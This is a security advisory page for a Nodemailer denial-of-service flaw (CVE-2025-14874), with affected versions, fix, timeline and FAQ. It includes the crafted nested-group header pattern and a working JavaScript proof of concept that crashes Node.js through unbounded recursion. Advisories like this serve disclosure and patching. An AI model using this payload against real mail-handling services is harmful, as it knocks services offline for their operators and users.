CVE-2025-14874: Nodemailer: nodemailer: denial of service via crafted email address header

Published Dec 1, 2025
·
Updated

Summary A DoS can occur that immediately halts the system due to the use of an unsafe function.

Details According to RFC 5322, nested group structures (a group inside another group) are not allowed. Therefore, in lib/addressparser/index.js, the email address parser performs flattening when nested groups appear, since such input is likely to be abnormal. (If the address is valid, it is added as-is.) In other words, the parser flattens all nested groups and inserts them into the final group list. However, the code implemented for this flattening process can be exploited by malicious input and triggers DoS

RFC 5322 uses a colon (:) to define a group, and commas (,) are used to separate members within a group. At the following location in lib/addressparser/index.js:

https://github.com/nodemailer/nodemailer/blob/master/lib/addressparser/index.js#L90

there is code that performs this flattening. The issue occurs when the email address parser attempts to process the following kind of malicious address header:

g0: g1: g2: g3: ... gN: victim;

Because no recursion depth limit is enforced, the parser repeatedly invokes itself in the pattern addressparser → handleAddress → addressparser → ... for each nested group. As a result, when an attacker sends a header containing many colons, Nodemailer enters infinite recursion, eventually throwing Maximum call stack size exceeded and causing the process to terminate immediately. Due to the structure of this behavior, no authentication is required, and a single request is enough to shut down the service.

The problematic code section is as follows: js if (isGroup) { ... if (data.group.length) { let parsedGroup = addressparser(data.group.join(',')); // <- boom! parsedGroup.forEach(member => { if (member.group) { groupMembers = groupMembers.concat(member.group); } else { groupMembers.push(member); } }); } } data.group is expected to contain members separated by commas, but in the attacker’s payload the group contains colon (:) tokens. Because of this, the parser repeatedly triggers recursive calls for each colon, proportional to their number.

PoC

const nodemailer = require('nodemailer');

function buildDeepGroup(depth) { let parts = []; for (let i = 0; i < depth; i++) { parts.push(g${i}:); } return parts.join(' ') + ' user;'; }

const DEPTH = 3000; // <- control depth const toHeader = buildDeepGroup(DEPTH); console.log('to header length:', toHeader.length);

const transporter = nodemailer.createTransport({ streamTransport: true, buffer: true, newline: 'unix' });

console.log('parsing start');

transporter.sendMail( { from: 'test', to: toHeader, subject: 'test', text: 'test' }, (err, info) => { if (err) { console.error('error:', err); } else { console.log('finished :', info && info.envelope); } } ); As a result, when the colon is repeated beyond a certain threshold, the Node.js process terminates immediately.

Impact The attacker can achieve the following:

1. Force an immediate crash of any server/service that uses Nodemailer 2. Kill the backend process with a single web request 3. In environments using PM2/Forever, trigger a continuous restart loop, causing severe resource exhaustion”

Other sources

A flaw was found in Nodemailer. This vulnerability allows a denial of service (DoS) via a crafted email address header that triggers infinite recursion in the address parser.

MITRE

Affected Software

6 affected componentsFixes available
npm/nodemailer
npm/nodemailer<7.0.11
7.0.11
Nodemailer Nodemailer Node.js<7.0.11
redhat Advanced Cluster Management For Kubernetes=2.0
redhat Ceph Storage=8.0
redhat Developer Hub

Event History

Dec 1, 2025
Data Sourced
via Red Hat·10:07 PM
DescriptionSeverityAffected Software
Dec 18, 2025
CVE Published
via MITRE·08:40 AM
Data Sourced
via MITRE·08:40 AM
DescriptionSeverityWeakness
Data Sourced
via NVD·09:15 AM
DescriptionSeverityWeakness
Data Sourced
via NVD·09:15 AM
RemedyAffected Software
Advisory Published
via GitHub·09:30 AM
Data Sourced
via GitHub·09:30 AM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

What is the severity of CVE-2025-14874?

CVE-2025-14874 is classified as a denial-of-service (DoS) vulnerability.

2

How do I fix CVE-2025-14874?

To fix CVE-2025-14874, upgrade to nodemailer version 7.0.11 or later.

3

What software is affected by CVE-2025-14874?

CVE-2025-14874 affects the nodemailer package used in Node.js applications.

4

What kind of attack does CVE-2025-14874 allow?

CVE-2025-14874 allows an attacker to immediately halt the system due to the use of an unsafe function.

5

What are the implications of not addressing CVE-2025-14874?

Failing to address CVE-2025-14874 could result in service disruptions due to potential DoS attacks.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203